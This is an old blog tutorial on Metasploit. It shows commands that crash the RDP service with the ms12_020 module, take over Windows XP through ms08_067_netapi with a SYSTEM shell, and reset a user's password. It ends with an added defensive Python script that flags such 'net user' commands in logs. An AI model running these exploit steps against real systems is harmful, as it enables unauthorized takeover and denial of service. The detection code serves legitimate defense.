Thursday, July 18, 2013

Metasploit Usage for Exploitation

This tutorial is very general, and I will continue updating it whenever I find exploits and have time to update this post.

1. If 3389/tcp (ms-term-serv) is open, then using Metasploit you can cause the remote machine to reboot or stop this service.

$ msfconsole
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST target-IP-Address
msf auxiliary(ms12_020_maxchannelids) > exploit

Now rescan the target computer; you will find that the ms-term-serv service is disabled.

2. Hacking Windows XP SP2/SP3 and getting administrator access to the system. (The following exploit attacks port 445.)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST target-IP-Address
msf exploit(ms08_067_netapi) > exploit
meterpreter > shell

C:\Windows\System32\> net user
C:\Windows\System32\> net user userName password
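
Seen from the defender's side, the "net user userName password" step above is visible in process-creation logging. The following is an added example, not part of the original post: it scans command-line records for net user invocations that set a password or add an account. The pipe-delimited record format, the sample lines, and the rule that such a command run as NT AUTHORITY\SYSTEM is high severity are assumptions made for illustration.

```python
# Constructed sample records (not real logs): time|host|account|command line
SAMPLE_LOG = """\
2013-07-18T10:02:11|WS-014|CORP\\alice|net user
2013-07-18T10:05:40|WS-014|NT AUTHORITY\\SYSTEM|net user
2013-07-18T10:05:52|WS-014|NT AUTHORITY\\SYSTEM|net  user  userName password
2013-07-18T11:30:03|WS-020|CORP\\helpdesk|net.exe user bob * /domain
2013-07-18T11:31:09|WS-020|CORP\\helpdesk|net1 user tempadmin Passw0rd! /add
2013-07-18T11:40:00|WS-020|CORP\\alice|net use \\\\fs01\\share
"""

NET_IMAGES = {"net", "net.exe", "net1", "net1.exe"}
SYSTEM = "NT AUTHORITY\\SYSTEM"

def classify(command_line):
    """Return 'list', 'password_set', 'account_add', 'other', or None if not net user."""
    tokens = command_line.split()  # simple whitespace split; quoted names not handled
    if len(tokens) < 2:
        return None
    image = tokens[0].lower().rsplit("\\", 1)[-1]  # drop any leading path
    if image not in NET_IMAGES or tokens[1].lower() != "user":
        return None
    switches = [t.lower() for t in tokens[2:] if t.startswith("/")]
    args = [t for t in tokens[2:] if not t.startswith("/")]
    if "/add" in switches:
        return "account_add"
    if len(args) >= 2:   # user name followed by a password (or * to prompt)
        return "password_set"
    if not args:         # bare "net user" only lists accounts
        return "list"
    return "other"

def find_alerts(log_text):
    """Return (time, host, account, action, severity) for account-changing commands."""
    alerts = []
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # skip malformed records
        when, host, account, command_line = parts
        action = classify(command_line)
        if action in ("password_set", "account_add"):
            # Assumption: administrators rarely change accounts from a SYSTEM shell.
            severity = "high" if account.upper() == SYSTEM else "review"
            # The command line is left out so the password is not copied into alerts.
            alerts.append((when, host, account, action, severity))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```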
